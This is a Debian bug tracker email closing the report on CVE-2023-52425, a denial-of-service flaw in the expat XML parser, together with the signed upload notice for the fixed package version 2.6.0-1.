Your message dated Tue, 06 Feb 2024 21:49:30 +0000 with message-id <e1rxtjq-00hygl...@fasolo.debian.org> and subject line Bug#1063238: fixed in expat 2.6.0-1 has caused the Debian Bug report #1063238, regarding expat: CVE-2023-52425 to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1063238: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1063238 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Source: expat Version: 2.5.0-2 Severity: important Tags: security upstream Forwarded: https://github.com/libexpat/libexpat/pull/789 X-Debbugs-Cc: car...@debian.org, Debian Security Team <t...@security.debian.org> Hi, The following vulnerability was published for expat. CVE-2023-52425[0]: | libexpat through 2.5.0 allows a denial of service (resource | consumption) because many full reparsings are required in the case | of a large token for which multiple buffer fills are needed. If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2023-52425 https://www.cve.org/CVERecord?id=CVE-2023-52425 [1] https://github.com/libexpat/libexpat/pull/789 [2] https://github.com/libexpat/libexpat/commit/34b598c5f594b015c513c73f06e7ced3323edbf1 Please adjust the affected versions in the BTS as needed. Regards, Salvatore
--- End Message ---
--- Begin Message ---Source: expat Source-Version: 2.6.0-1 Done: Laszlo Boszormenyi (GCS) <g...@debian.org> We believe that the bug you reported is fixed in the latest version of expat, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1063...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Laszlo Boszormenyi (GCS) <g...@debian.org> (supplier of updated expat package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Tue, 06 Feb 2024 22:00:26 +0100 Source: expat Architecture: source Version: 2.6.0-1 Distribution: unstable Urgency: high Maintainer: Laszlo Boszormenyi (GCS) <g...@debian.org> Changed-By: Laszlo Boszormenyi (GCS) <g...@debian.org> Closes: 1063238 1063240 Changes: expat (2.6.0-1) unstable; urgency=high . * New upstream release: - fixes CVE-2023-52425: fix quadratic runtime issues with big tokens that can cause denial of service (closes: #1063238), - fixes CVE-2023-52426: fix billion laughs attacks for users compiling without XML_DTD defined (which is not common) (closes: #1063240). Checksums-Sha1: 68913585cf4c600408c97782d2559ef7af83d2ee 1964 expat_2.6.0-1.dsc 6cd4f2cdafaa7f3176200542736c7d40c9438362 8414635 expat_2.6.0.orig.tar.gz 4e5a46ceb154dcc24e724e2ba97a9161f2478706 12920 expat_2.6.0-1.debian.tar.xz Checksums-Sha256: 6473ff559f741ff08b95d3b3a8e16fab89a9b7e195215f23fe4eb19f353468d6 1964 expat_2.6.0-1.dsc 87e35fde768baf3b31a78dd2807eb456618acf4d6c512660a1796c684b2515f9 8414635 expat_2.6.0.orig.tar.gz dd9d930c64e310b281ccab88d76babe8e6d67d0ea386d30fac66efd931e1173e 12920 expat_2.6.0-1.debian.tar.xz Files: e0e9960787865ff4e36651e81b2e7b73 1964 text optional expat_2.6.0-1.dsc aa424e56fe6378bb4b9f26b903f42119 8414635 text optional expat_2.6.0.orig.tar.gz a679de87fc12b80d698a424c59180ed9 12920 text optional expat_2.6.0-1.debian.tar.xz -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEfYh9yLp7u6e4NeO63OMQ54ZMyL8FAmXCpKAACgkQ3OMQ54ZM yL8kZg//ULL2imt7oNCqdeRn2qlFvRB9ePsZih5yBZatU2qPeXlGVJxuIFfr3B+O sDiXHBo476GDHmAhKoVZTcQOz7pGT8JWUgZKuIW4GzJllrMdNDY9XWLkqZnI0lns 6j34VhK89L6l2PU0cVGIlf9Ffr3c4MUCAeJ/QFmcTgwny23vR34HDcHbHPh2bwg8 QubEJpe6Uxix2zZIRAE4MIIjvNXRpR33hbd5IegmB1ujPC8jQYSuuO84Ahr9FD6u nbf5/V7+CTQlhSuGdWZnPH4cLzBk/BHaXORiTH3GwNtFqLB0MIFsxtHgwkZpiSC9 pNKwL45v2QDoQxsPsuZBJV0mEZroH0+QT6Yyewt+DL+2MPcmFRQB2SgdkOX1mcxk kOCJ3fS+W8MQICvgO5I+WnIc4RTt2862P7e8SmbLC+HLNWJnL6IMvE0im7WZ1DZl Nzj2EJPcjOxeohu2TYGHISXxzTwXgP37nhNQLdwvpAc2GXe+h9WPl9bvNS+U6aiS lAta7u9NOA8qMLeupTKk1TTEzO6tknAGr1U5ssHX2Mc38HVZFh/EBy8CcK6pkjTz XVAfRjQ2O+eb1ikzMzN0edX71HUR4gtzjKqrjNK6tZYREb8LZYezpoHKLloPH7PD oK/wcuA5w8h0KXYPgLFuk3fGh8kD2w7lUFx71BtrGzIAGPiIaxo= =jrTI -----END PGP SIGNATURE-----
--- End Message ---
